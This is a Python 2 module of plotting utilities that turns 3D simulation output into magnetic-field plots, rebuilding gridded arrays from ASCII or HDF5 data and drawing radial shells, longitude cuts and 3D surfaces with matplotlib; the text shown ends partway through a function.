def get_array_vars(fname_inp=None, data=None, checks=False, complete_domain_walk=False, vnames=[], data_processor=None, vdict=None, vectorial=False):
"""
- read data from the ASCII file w/o assuming that it is consistent
w/ a complete grid-structure of cells and children-blocks
- We just produce one SCALAR observable determined by the
function 'data_processor()'.
"""
assert (fname_inp is not None) or (data is not None),\
' [-] ERROR: we need ASCII/HDF5 file or parsed data!\n'
if data is None:
# read_data() will handle the file format
r, ph, th, _vdict, fformat = read_data(fname_inp, vnames)
else:
r, ph, th, _vdict, fformat = data
if vdict is not None: vdict.update(_vdict)
ndata = r.size
# obtain Bmod from vdict
logger.info(' [+] processing input data to obtain observable...')
assert data_processor is not None, ' [-] We need a processor function!\n'
if fformat in ('ascii', 'binary'): # we need some treatment
# NOTE: in case vectorial==True, we need the transpose.
pdata = np.transpose(data_processor(_vdict))
if not(len(pdata.shape)==1 and not vectorial) and \
not(len(pdata.shape)>1 and vectorial):
raise SystemExit(' [-] parser conflict: observables is either scalar or vectorial.\n')
# make a full-domain discovery by walking all the
# entries (one by one) in the ASCII file.
eps = 0.005*0.05 #0.005 # tolerance for degeneration detection
logger.info(' [+] making domain discovery...')
_r, _ph, _th = get_domains([r,ph,th],
eps=eps, # precision for domain discovery
checks=checks,
complete=complete_domain_walk,
nc=None, nRoot=None, nLevel=None,
)
print('')
logger.info(' [+] domain is in the ranges: ')
logger.info(' r in (%g, %g) ' % ( _r.min(), _r.max()))
logger.info(' ph in (%g, %g) ' % (_ph.min(), _ph.max()))
logger.info(' th in (%g, %g) \n' % (_th.min(), _th.max()))
# allocate data buffer
if len(pdata.shape) == 1: # scalar
data = np.nan * np.ones((_r.size,_ph.size,_th.size), dtype=np.float32)
else: # vector
data = np.nan * np.ones((_r.size,_ph.size,_th.size, 3), dtype=np.float32)
logger.info(' [+] building 3D array...')
for ind in range(ndata):
# find the coordinate where it coincides with any
# of the (_r, _ph, _th)
i_r = (np.abs(_r - r[ind]) < eps).nonzero()[0][0]
i_ph = (np.abs(_ph - ph[ind]) < eps).nonzero()[0][0]
i_th = (np.abs(_th - th[ind]) < eps).nonzero()[0][0]
# make sure we are assignating values to this array element
# for the 1st time!
assert np.all(np.isnan(data[i_r,i_ph,i_th])), \
'\n [-] this array element already has a value!!\n'+\
' * (i_r,i_ph,i_th): %d, %d, %d\n'%(i_r, i_ph, i_th)+\
' * file: %s\n'%(fname_inp if fname_inp is not None else '<data>')
# assignate value to this array-element
data[i_r,i_ph,i_th] = pdata[ind]
# percentage of the array that is storing the data that we
# actually read from 'fname_inp'.
fill_perc = 100.*(data.size - np.isnan(data).nonzero()[0].size)/data.size
logger.info(' [+] the data array was filled at %g %% \n' % fill_perc)
elif fformat=='hdf5':
_r, _ph, _th = r, ph, th
data = data_processor(_vdict, **{'r':r,'ph':ph,'th':th})
        # NOTE: in case vectorial==True, we need a transpose
if vectorial:
data = data.transpose((1,2,3,0))
else:
raise SystemExit(' [-] wrong format (%r)!'%fformat)
return {
'ndata' : ndata,
'coords' : (_r, _ph, _th),
'data' : data
}
#@profile
def get_array_Bmod(fname_inp, nc=[6,4,4], nRoot=[8,8,4], nLevel=1):
r, ph, th, Bmod = read_data(fname_inp)
ndata = r.size
nc_r, nc_ph, nc_th = nc
nRootX, nRootY, nRootZ = nRoot
print "------ comeon men..."
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
# nmbr of blocks (or "sub-blocks")
nb_r = npart_D*nRootX
nb_ph = npart_D*nRootY
nb_th = npart_D*nRootZ
if nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th == ndata:
print ' [+] the number of entries in the file is consistent'
print ' with the number of cells/blocks and the nLevel'
print ' parameters!'
else:
# inconsistency in number of entries!
raise SystemExit("""
Inconsistency in the number of entries in the file!
>> expected : %d
>> number of entries in file : %d
"""%(nc_r*nb_r * nc_ph*nb_ph * nc_th*nb_th, ndata))
# initialize data
data = np.zeros((nc_r*nb_r, nc_ph*nb_ph, nc_th*nb_th))
_r = np.zeros(nc_r*nb_r)
_ph = np.zeros(nc_ph*nb_ph)
_th = np.zeros(nc_th*nb_th)
ib = 0
while ib*(nc_r*nc_th*nc_ph) < r.size:
print " block: ", ib
for ic_th in range(nc_th):
for ic_ph in range(nc_ph):
for ic_r in range(nc_r):
ind, ind_r, ind_ph, ind_th = \
ib_to_ind([ic_r,ic_ph,ic_th], ib, [r,ph,th],
nRoot, nc, nLevel)
# if it's not in zeros, you're trying to overwrite something!
assert (data[ind_r,ind_ph,ind_th] == 0.0),\
'\n [-] ERROR: trying to overwrite values!\n'
if _r[ind_r]!=0.0 and np.abs(r[ind]-_r[ind_r])>0.005:
import pdb; pdb.set_trace()
data[ind_r,ind_ph,ind_th] = Bmod[ind]
_r[ind_r] = r[ind]
_ph[ind_ph] = ph[ind]
_th[ind_th] = th[ind]
ib += 1
return {
'coords' : [_r, _ph, _th],
'Bmod' : data,
}
#@profile
def get_index_r(c, co):
"""
NOTE: we assume the coordinate 'c' is a monotonically ascending variable.
"""
dc_max = (c[1:] - c[:-1]).max() # coarser resolution in c
# what follows is valid if we fulfill this:
cmin, cmax = c[0], c[-1]
assert (co<=cmax) and (co>=cmin),\
'\n [-] ERROR: \'co\' (=%g) must be inside the interval (%g, %g)\n'%(co,cmin,cmax)
assert c[0]==c.min() and c[-1]==c.max(), \
' [-] ERROR: this variable should be monotically ascending!\n'
# choose the closest in the grid
co_behind, co_ahead = c[c<=co][-1], c[c>=co][0]
be_gt_ah = (co-co_behind) >= (co_ahead-co)
if be_gt_ah:
i_c = (c>=co).nonzero()[0][0] ## RIGHT??. Check first!!
else:
i_c = (c<=co).nonzero()[0][-1]
return i_c
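# e.g. get_index_r(np.array([1., 2., 3.]), 2.4) -> 1, since 2.0 is the grid
# value closest to 2.4 (illustrative call).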
def get_subcoord(isb, iLevel=0):
"""
isb : cardinal of the sub-block inside the memory (or root) block
iLevel : level of bipartition
"""
ibb = isb % 8
scoord_r = (ibb % (2**1))/(2**0)
scoord_ph = (ibb % (2**2))/(2**1)
scoord_th = (ibb % (2**3))/(2**2)
"""
Depending on the value of iLevel, the 3-tuple that get_subcoord(..)
returns means different things. For instance,
iLevel=0: the finest-grained location of the sub-block number isb.
iLevel=1: the location of the octree in units of number of octrees.
iLevel=2: the location of the octree that contains 8 octrees.
... so on ...
"""
if iLevel>0:
_i0, _i1, _i2 = get_subcoord(isb/8, iLevel=iLevel-1)
scoord_r += _i0*2
scoord_ph += _i1*2
scoord_th += _i2*2
return scoord_r, scoord_ph, scoord_th
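# e.g. get_subcoord(9, iLevel=1) -> (3, 0, 0): sub-block 1 inside octree 1,
# stacked along the r direction (illustrative call; Python 2 integer division
# is assumed, as in the rest of this module).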
def deduce_terna(ib, nRoot=[8,8,4], nc=[6,4,4], nLevel=1):
"""
According to documentation, X,Y,Z goes in the same order
as R,LON,LAT.
"""
nRootX, nRootY, nRootZ = nRoot
nc_r, nc_ph, nc_th = nc
# location inside the mem-blk, in units of sub-blocks
    # TODO: check whether this should be replaced with 'nLevel'
    # TODO: test with other values of nLevel != 1
npart_D = 2**nLevel # number of bi-partitions in EACH DIMENSION
ibb_r, ibb_ph, ibb_th = \
get_subcoord(isb=ib%(npart_D**3), # cardinal inside the root block
iLevel=nLevel)
# the "octree" is composed by 2**(3*nLevel) children-blocks.
ib_mem = int(ib/(npart_D**3))
ib_mem_r = ib_mem % nRootX
ib_mem_ph = (ib_mem/nRootX) % nRootY
ib_mem_th = ib_mem / (nRootX*nRootY)
return {
'ib_mem': [ib_mem_r, ib_mem_ph, ib_mem_th],
'ibb': [ibb_r, ibb_ph, ibb_th],
}
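# e.g. with the default nRoot/nc/nLevel, deduce_terna(10) returns
# {'ib_mem': [1, 0, 0], 'ibb': [0, 1, 0]}: child-block 2 of memory block 1
# (illustrative call).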
def make_sphere_shells(dir_src, dir_out, prefix_fig, ro, pazim=-60., clim=[None,None], verbose='debug', vnames=[], data_processor=None):
prefix_inp = '3d__var_1_n'
fnm_s = glob.glob(dir_src + '/' + prefix_inp + '*.out')
# get the time labels as 'int' variables && sort it
it_s = [ int(fnm.split('.out')[-2].split(prefix_inp)[-1]) for fnm in fnm_s ]
it_s.sort()
# number of digits in the time label (take the 1st element as sample)
#ndigits = len(fnm_s[0].split('.out')[-2].split(prefix_inp)[-1])
for it in it_s:
fname_inp = dir_src + '/' + prefix_inp + '%08d.out'%it
fname_fig = dir_out + '/' + prefix_fig + '%08d.png'%it
logger.info(' [+] generating figure %d/%d ...\n' % (it, len(it_s)))
_o = plot_sphere_cuts(fname_inp, fname_fig, ro, pazim, clim,
checks=False, complete=True, verbose=verbose, vnames=vnames,
data_processor=data_processor)
logger.info(' [+] saved: %s\n' % fname_fig)
del _o
def plot_sphere_cuts(fname_inp, fname_fig, ro, pazim=-60., clim=[None,None], checks=False, complete=True, verbose='debug', vnames=[], data_processor=None, nc=None, nRoot=None, nLevel=None):
"""
make 3D plot with a radial and longitudinal cuts
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
#d = get_array_Bmod(fname_inp, nc, nRoot, nLevel)
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=checks, complete_domain_walk=complete, vnames=vnames, data_processor=data_processor)
    # NOTE: d['data'] is processed stuff built from the original (from
    # the ASCII file) simulation data. Such processing was made
    # by 'data_processor()'.
    # NOTE: at this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords']
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
#--- slice an specific shell r=ro
i_r = get_index_r(r, ro)
print ' > We\'ll plot i_r: ', i_r
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = Bmod.transpose((1,0,2))[:,i_r,:]
# same w/o NaNs
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph, th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, PH, TH = np.meshgrid(r, ph_clean, th_clean)
# get the cartesian coords (I know!)
X = R * np.cos(TH) * np.cos(PH)
Y = R * np.cos(TH) * np.sin(PH)
Z = R * np.sin(TH)
#--- figure
fig = figure(1,)
ax = fig.add_subplot(111, projection='3d')
norm = Normalize(cbmin, cbmax)
# other options
opt = {
'rstride' : 1,
'cstride' : 1,
'linewidth' : 0,
'antialiased' : False,
'shade' : False,
'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : Normalize(cbmin, cbmax),
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var)),
#'edgecolors' : 'none',
}
print '\n [*] Generating 3D plot...\n'
surf = ax.plot_surface(X[:,i_r,:], Y[:,i_r,:], Z[:,i_r,:], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
# perspective azimuth
ax.azim = pazim
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var); #surf.set_array(var)
ax.set_xlabel('X [Ro]')
ax.set_ylabel('Y [Ro]')
ax.set_zlabel('Z [Ro]')
ax.set_title('$r_o$ = %.2g $R_o$' % r[i_r])
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
#show()
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
#@profile
def PlotCut_fixed_ph(fig_stuff, data, pho, r_range, pazim=-60., verbose='debug'):
"""
make 3D plot with a radial and longitudinal cuts
"""
r2d = 180./np.pi
    Bmod = data['data'] # TODO: change 'Bmod' to data/var/something
r, ph, th = data['coords']
#--- slice an specific longitude slice at 'pho'
i_ph = get_index_r(ph, pho/r2d)
print ' > We\'ll plot i_ph: ', i_ph
# set the plot range in 'r'
i_r_min = get_index_r(r, r_range[0])
i_r_max = get_index_r(r, r_range[1])
# we'll search a interval in phi such that var_bare has some numeric values.
# NOTE: 10 iterations seems reasonable.
for i_dph in range(0,10):
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = np.nanmean(
Bmod.transpose((1,0,2))[i_ph-i_dph:i_ph+i_dph+1,i_r_min:i_r_max+1,:],
axis = 0,
)
# if it has some numeric content, we have valid
# data in 'var_bare', so we are done.
if not np.isnan(np.nanmean(var_bare)): break
# same w/o NaNs
var, r_clean, th_clean = clean_sparse_array(var_bare,r[i_r_min:i_r_max+1],th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
print " >> mean, median: ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, TH = np.meshgrid(r_clean, th_clean)
# get the cartesian coords (I know!)
X = R * np.cos(TH) * np.cos(ph[i_ph])
Y = R * np.cos(TH) * np.sin(ph[i_ph])
Z = R * np.sin(TH)
#--- figure
fig_stuff['fig'], fig_stuff['ax'], surf = plot_stuff(
[fig_stuff['fig'], fig_stuff['ax']],
coords = [X,Y,Z],
var = var.T,
norm = fig_stuff['norm'],
)
return {
'FigAx' : (fig_stuff['fig'], fig_stuff['ax']),
'ph_plot' : ph[i_ph],
'surf' : surf,
}
#@profile
def PlotCut_fixed_r(fig_stuff, data, ro, pazim=-60., verbose='debug'):
"""
make 3D plot with a radial and longitudinal cuts
"""
r2d = 180./np.pi
# kws
    Bmod = data['data'] # TODO: change 'Bmod' to data/var/something
r, ph, th = data['coords']
#--- slice an specific shell r=ro
i_r = get_index_r(r, ro)
print ' > We\'ll plot i_r: ', i_r
# we need the transpose in order to be consistent with 'plot_surface'
var_bare = Bmod.transpose((1,0,2))[:,i_r,:]
# same w/o NaNs
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph, th)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
#cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
PH, TH = np.meshgrid(ph_clean, th_clean)
# get the cartesian coords (I know!)
X = r[i_r] * np.cos(TH) * np.cos(PH)
Y = r[i_r] * np.cos(TH) * np.sin(PH)
Z = r[i_r] * np.sin(TH)
#norm = LogNorm(cbmin,cbmax) if kws.get('cscale','log')=='log' else Normalize(cbmin,cbmax)
#--- figure
fig_stuff['fig'], fig_stuff['ax'], surf = plot_stuff(
[fig_stuff['fig'], fig_stuff['ax']],
coords = [X,Y,Z],
var = var.T,
norm = fig_stuff['norm'],
)
return {
'FigAx' : (fig_stuff['fig'], fig_stuff['ax']),
'r_plot' : r[i_r],
'surf' : surf,
}
def plot_stuff(FigAx, coords, var, norm):
fig, ax = FigAx
X, Y, Z = coords
#--- figure
# other options
opt = {
'rstride' : 1,
'cstride' : 1,
'linewidth' : 0,
'antialiased' : False,
'shade' : False,
'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : norm,
'vmin' : norm.vmin, #kargs.get('cbmin',1),
'vmax' : norm.vmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var)),
#'edgecolors' : 'none',
}
print '\n [*] Generating 3D plot...\n'
surf = ax.plot_surface(X[:,:], Y[:,:], Z[:,:], **opt)
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
return fig, ax, surf
def file_format(fname):
cmd = 'file %s | awk -F: \'{print $2}\'' % fname
p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, bufsize=1, shell=True)
std = p.communicate()
assert p.returncode == 0, \
'\n [-] something went wrong: %r\n' % std
stdout = std[0]
if stdout.startswith(' ASCII text'):
return 'ascii'
elif stdout.startswith(' Hierarchical Data Format (version 5) data'):
return 'hdf5'
elif stdout.startswith(' data'):
return 'binary'
else:
return None
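# e.g. this helper is expected to return 'hdf5' for an HDF5 input and 'ascii'
# for a plain-text .out file; it shells out to the Unix `file` utility, so the
# exact signature strings may vary between systems.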
#@profile
def make_3dplot(fname_inp, fname_fig, clim=[None,None], vnames=[], data_processor=None, verbose='debug', **kws):
"""
make 3D plot with a radial and longitudinal cuts
"""
logger.setLevel(getattr(logging, verbose.upper()))
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
# - fill 'vdict'' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True, vnames=vnames, data_processor=data_processor)
    # NOTE: d['data'] is processed stuff built from the original (from
    # the ASCII file) simulation data. Such processing was made
    # by 'data_processor()'.
    # NOTE: at this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords']
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
    cbmin, cbmax = clim if clim != [None,None] else (np.nanmin(Bmod), np.nanmax(Bmod))
figsize = kws.get('figsize', None) # [inches] 2-tuple
if figsize is None:
# Deduce the 'figsize' as a function of:
# * the dpi of the monitor
# * the desired size in pixels of the figure
# Grab the dpi value of this monitor. Source:
# * https://stackoverflow.com/questions/13714454/specifying-and-saving-a-figure-with-exact-size-in-pixels#13714720
# * https://stackoverflow.com/questions/3129322/how-do-i-get-monitor-resolution-in-python/45467999#45467999
tk = Tkinter.Tk()
dpi_w = tk.winfo_screenwidth()/(tk.winfo_screenmmwidth()/25.4)
dpi_h = tk.winfo_screenheight()/(tk.winfo_screenmmheight()/25.4)
# size in pixels
pixels = kws.get('pixels', [128.,100.])
figsize = (pixels[0]/dpi_w, pixels[1]/dpi_h) # [inches]
#--- figure
fig_stuff = {
'fig' : figure(1, figsize=figsize),
}
fig_stuff.update({
'ax' : fig_stuff['fig'].add_subplot(111, projection='3d'),
'norm' : LogNorm(cbmin,cbmax) if kws.get('cscale','log')=='log' else Normalize(cbmin,cbmax),
})
fig = fig_stuff['fig']
ax = fig_stuff['ax']
norm = fig_stuff['norm']
#--- plot for fixed "r"
o__fixed_r = PlotCut_fixed_r(fig_stuff, d,
ro = kws.get('ro', 5.0),
pazim = kws.get('pazim',-60.),
verbose = verbose,
)
fig, ax = o__fixed_r['FigAx']
r_plot = o__fixed_r['r_plot']
surf_r = o__fixed_r['surf']
#--- plot for fixed "ph"
r_range = kws.get('r_range', [1.0,7.0])
pho = kws.get('pho', 10.0)
o__fixed_r = PlotCut_fixed_ph(fig_stuff, d,
pho = pho,
r_range=r_range,
pazim = kws.get('pazim',-60.),
verbose = verbose,
)
fig, ax = o__fixed_r['FigAx']
ph_plot = o__fixed_r['ph_plot']
surf_ph = o__fixed_r['surf']
# uniform axis limits
axmin = np.min([getattr(ax,'get_%slim'%dim)() for dim in ('x','y','z')])
axmax = np.max([getattr(ax,'get_%slim'%dim)() for dim in ('x','y','z')])
ax.set_xlim(axmin,axmax)
ax.set_ylim(axmin,axmax)
ax.set_zlim(axmin,axmax)
# perspective azimuth
ax.azim = kws.get('pazim', -60.)
sm = cm.ScalarMappable(cmap=surf_r.cmap, norm=fig_stuff['norm'])
sm.set_array(d['data']); #surf.set_array(var)
# labels && title
ax.set_xlabel('X [Ro]')
ax.set_ylabel('Y [Ro]')
ax.set_zlabel('Z [Ro]')
TITLE = '$r_o$ = %.2g $R_o$' % r_plot +\
'\n($\phi_o$,r1,r2) : ($%g^o,%g\,Ro,%g\,Ro$)' % (pho,r_range[0],r_range[1])
# extract the step number from the input filename
if kws.get('wtimelabel',False):
tlabel = fname_inp.split('/')[-1].split('.h5')[0].split('_')[-1].replace('n','')
TITLE += '\n step: '+tlabel
ax.set_title(TITLE)
#--- colorbar
cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
#show()
fig.savefig(fname_fig, dpi=kws.get('dpi',100), bbox_inches='tight')
close(fig)
del fig
return None
def r_cut(fname_inp, fname_fig, ro, _dph=[None,None], _dth=[None,None], figsize=(6,4), clim=[None,None], colormap='hot', cb_label='|B| [G]', verbose='debug', vnames=[], data_processor=None, cscale='linear', interactive=False, **kws):
"""
make 2D plot with a radial cut
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
    # - fill 'vdict' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True,
vnames=vnames, data_processor=data_processor)
assert d is not None
    # NOTE: d['data'] is processed stuff built from the original (from
    # the ASCII file) simulation data. Such processing was made
    # by 'data_processor()'.
    # NOTE: at this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords'] # shape (:,:,:)
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
# check defaults values
dth = copy.deepcopy(_dth) # (*)
dth[0] = dth[0] if dth[0] is not None else th[0]*r2d
dth[1] = dth[1] if dth[1] is not None else th[-1]*r2d
dph = copy.deepcopy(_dph) # (*)
dph[0] = dph[0] if dph[0] is not None else ph[0]*r2d
dph[1] = dph[1] if dph[1] is not None else ph[-1]*r2d
# (*): we need to make a copy because otherwise it will change the
# value of the pointer that is given in _th (_ph); if this happens,
# the values that dth (dph) adopts here will be parsed as argument
# in the next call to the present function!
# So, in order to keep the original value that is parsed as argument
# dth, dph the first time, we should read it in "read-only" mode with
# deepcopy().
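    # Tiny illustration of the aliasing issue (hypothetical values, not from the data):
    #   _dth = [None, None]            # caller's default list
    #   dth  = _dth; dth[0] = -90.     # without deepcopy the default is now [-90., None]
    #   -> every later call would silently inherit -90. as its lower theta limit.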
# make selection in a given width in longitude (centered in
# the `lon` value)
cc_ph = (ph*r2d>=dph[0]) & (ph*r2d<=dph[1])
cc_th = (th*r2d>=dth[0]) & (th*r2d<=dth[1])
if (cc_ph.nonzero()[0].size > 0) and (cc_th.nonzero()[0].size > 0):
print(' [+] phi plot limits: (%g, %g)' % (ph[cc_ph][0]*r2d,ph[cc_ph][-1]*r2d))
else:
raise SystemExit(
'\n [-] the selection in longitude and theta is NULL!\n' +\
' cc_ph.size: %d\n cc_th.size: %d\n' % (cc_ph.nonzero()[0].size, cc_th.nonzero()[0].size)
)
    #--- slice at a specific r
# set the plot range in 'r'
i_r = get_index_r(r, ro)
i_th_ini = get_index_r(th*r2d, dth[0])
i_th_end = get_index_r(th*r2d, dth[1])
    logger.debug(' [+] averaging slices in phi and r ...')
#var_bare = np.nanmean(Bmod.transpose((1,0,2))[cc_ph,i_r,:], axis=0)
var_bare = Bmod.transpose((1,0,2))[cc_ph,i_r,i_th_ini:i_th_end+1]
# same w/o NaNs columns/rows
var, ph_clean, th_clean = clean_sparse_array(var_bare, ph[cc_ph], th[cc_th])
#fig = figure(1,); ax=fig.add_subplot(111)
#ax.pcolor(var); show()
#import pdb; pdb.set_trace()
var_m = np.ma.masked_where(np.isnan(var), var)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] \
if clim==[None,None] else clim
print " >> mean/median: ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
PH, TH = np.meshgrid(ph_clean*r2d, th_clean*r2d)
#--- figure
fig = figure(1, figsize=figsize)
ax = fig.add_subplot(111, )
#--- other options
# color scale
if cscale=='linear':
norm = Normalize(cbmin, cbmax)
elif cscale=='log':
norm = LogNorm(cbmin, cbmax)
else:
raise SystemExit(' [-] invalid color scale: '+cscale+'\n')
opt = {
#'rstride' : 1,
#'cstride' : 1,
'linewidth' : 0,
#'antialiased' : False,
#'shade' : False,
#'shading' : 'flat',
#'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : getattr(cm,colormap), #cm.hot, # gray-scale
'norm' : norm,
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
#'facecolors' : cm.jet(norm(var_m)),
#'interpolation' : 'none',
'edgecolors' : 'None',
#'corner_mask' : True,
}
# Note the cm.jet(..) --> cm.jet(norm(..)); see:
# https://stackoverflow.com/questions/25023075/normalizing-colormap-used-by-facecolors-in-matplotlib
    print '\n [*] Generating 2D plot...\n'
#surf = ax.contourf(RHO[:,:], Z[:,:], var_m[:,:].T, **opt)
surf = ax.pcolormesh(PH[:,:], TH[:,:], var_m[:,:].T, **opt)
#surf = ax.scatter(th_clean, r_clean, c=var[:,:], **opt)
_iph, _ith = np.argwhere(~np.isnan(var[:,:])).T
_ph, _th = ph_clean[_iph], th_clean[_ith]
#surf = ax.scatter(_ph, _th, c=var[_iph,_ith], **opt)
# perspective azimuth
sm = cm.ScalarMappable(cmap=surf.cmap, norm=surf.norm)
sm.set_array(var_m); #surf.set_array(var)
ax.set_xlabel('$\phi$ [deg]')
ax.set_ylabel('$\\theta$ [deg]')
TITLE = '$r_o = %.2f$ $R_O$\n' % r[i_r] +\
'$\phi$ limits: $(%.1f, %.1f)^o$\n'%(ph[cc_ph][0]*r2d, ph[cc_ph][-1]*r2d) +\
'$\\theta$ limits: $(%.1f, %.1f)^o$'%(th[i_th_ini]*r2d,th[i_th_end]*r2d)
# extract the step number from the input filename
if kws.get('wtimelabel',False):
tlabel = fname_inp.split('/')[-1].split('.h5')[0].split('_')[-1].replace('n','')
TITLE += '\n step: '+tlabel
ax.set_title(TITLE)
#--- colorbar
#cb_label = '|B| [G]'
cb_fontsize = 13
axcb = fig.colorbar(sm, ax=ax)
axcb.set_label(cb_label, fontsize=cb_fontsize)
sm.set_clim(vmin=cbmin, vmax=cbmax)
# save figure
if interactive:
show()
else:
fig.savefig(fname_fig, dpi=135, bbox_inches='tight')
close(fig)
return d
def lon_cut(fname_inp, fname_fig, lon=0.0, dlon=0.0, r_range=[1.,24.], clim=[None,None], verbose='debug', vnames=[], data_processor=None, cscale='linear', interactive=False):
"""
    make 2D plot with a cut at fixed longitude (meridional plane)
"""
logger.setLevel(getattr(logging, verbose.upper()))
r2d = 180./np.pi
assert len(vnames)>0, ' [-] We need names in vnames!\n'
# we'll obtain:
# - same data but in structured way; friendly for plot_surface().
    # - fill 'vdict' with original ASCII data
d = get_array_vars(fname_inp, checks=False, complete_domain_walk=True, vnames=vnames, data_processor=data_processor)
assert d is not None
    # NOTE: d['data'] is processed stuff built from the original (from
    # the ASCII file) simulation data. Such processing was made
    # by 'data_processor()'.
    # NOTE: at this point, 'vdict' has the original data from the ASCII file.
r, ph, th = d['coords'] # shape (:,:,:)
Bmod = d['data'];
print ' [+] global extremes:', np.nanmin(Bmod), np.nanmax(Bmod)
    #--- slice at a specific longitude = `lon`
#i_ph = get_index_r(ph*r2d, lon)
#print ' > We\'ll plot i_ph: ', i_ph
# set the plot range in 'r'
i_r_min = get_index_r(r, r_range[0])
i_r_max = get_index_r(r, r_range[1])
# make selection in a given width in longitude (centered in
# the `lon` value)
cc_ph = (ph*r2d>=(lon-.5*dlon)) & (ph*r2d<=(lon+.5*dlon))
if (cc_ph.nonzero()[0].size > 0) and (i_r_max - i_r_min + 1 > 0):
print(' [+] phi plot limits: (%g, %g)' % (ph[cc_ph][0]*r2d,ph[cc_ph][-1]*r2d))
print(' [+] r plot limits: (%g, %g)\n' % (r[i_r_min], r[i_r_max]))
else:
raise SystemExit('\n [-] the selection in longitude and radii is NULL!\n')
logger.debug(' [+] averaging %d slices of phi ...'%len(cc_ph.nonzero()[0]))
var_bare = np.nanmean(Bmod.transpose((1,0,2))[cc_ph,i_r_min:i_r_max+1,:], axis=0)
# same w/o NaNs columns/rows
var, r_clean, th_clean = clean_sparse_array(var_bare, r[i_r_min:i_r_max+1], th)
#var_m = np.ma.masked_where(np.isnan(var),var)
#var_m = np.ma.array(var, mask=np.isnan(var))
var_m = np.ma.masked_where(np.isnan(var), var)
print '[+] plot extremes: ', np.nanmin(var), np.nanmax(var)
# NOTE: 'plot_surface' can only plot variables with shape (n,m), so
# no 3D variables.
cbmin, cbmax = [np.nanmin(var), np.nanmax(var)] if clim==[None,None] else clim
print " >> ", np.nanmean(var), np.nanmedian(var)
# mesh versions of the coords
R, TH = np.meshgrid(r_clean, th_clean)
# get the cartesian coords (I know!)
RHO = R * np.cos(TH)
Z = R * np.sin(TH)
#--- figure
fig = figure(1, figsize=(6,5))
ax = fig.add_subplot(111, )
#--- other options
# color scale
if cscale=='linear':
norm = Normalize(cbmin, cbmax)
elif cscale=='log':
norm = LogNorm(cbmin, cbmax)
else:
raise SystemExit(' [-] invalid color scale: '+cscale+'\n')
opt = {
#'rstride' : 1,
#'cstride' : 1,
'linewidth' : 0,
#'antialiased' : False,
#'shade' : False,
#'shading' : 'flat',
#'alpha' : 1., #kargs.get('alpha',0.9),
'cmap' : cm.jet, # gray-scale
'norm' : norm,
'vmin' : cbmin, #kargs.get('cbmin',1),
'vmax' : cbmax, #kargs.get('cbmax',1000),
'facecolors' : cm.jet(norm(var_m)),
#'interpolation' : 'none',
'edgecolors' : 'None',
#'corner_mask' : True,
}
    print '\n [*] Generating 2D plot...\n'
